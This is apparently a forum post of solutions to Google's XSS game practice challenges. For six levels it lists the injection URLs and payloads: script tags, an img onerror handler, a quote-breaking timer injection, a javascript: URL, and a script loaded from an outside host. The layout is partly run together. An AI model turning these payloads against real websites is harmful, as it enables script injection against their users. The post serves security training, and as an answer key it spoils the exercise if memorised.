- by x32x01 ||
Below are the solutions to Google XSS challenges hosted on https://xss-game.appspot.com
Vector
Vector
Vector
Vector
Follow the White Rabbit
Query
Vector
Level 1: Hello, world of XSS
Queryhttps://xss-game.appspot.com/level1/frame?query=<script>alert(1)</script>Vector
<script>alert(1)</script>Level 2: Persistence is key
Vector"><img src=x onerror=alert(1)>Level 3: That sinking feeling...
Queryhttps://xss-game.appspot.com/level3/frame#'/><script>alert(1)</script>Vector
'/><script>alert(1)</script>Level 4: Context matters
Queryhttps://xss-game.appspot.com/level4/frame?timer=1');alert('1Vector
1')%3Balert('1Level 5: Breaking protocol
Queryhttps://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)Vector
javascript:alert(1)Follow the White Rabbit
Query
https://xss-game.appspot.com/level6/frame#HTTPS://dj-infosec.divshot.io/content.jsVector
HTTPS://dj-infosec.divshot.io/content.js Last edited: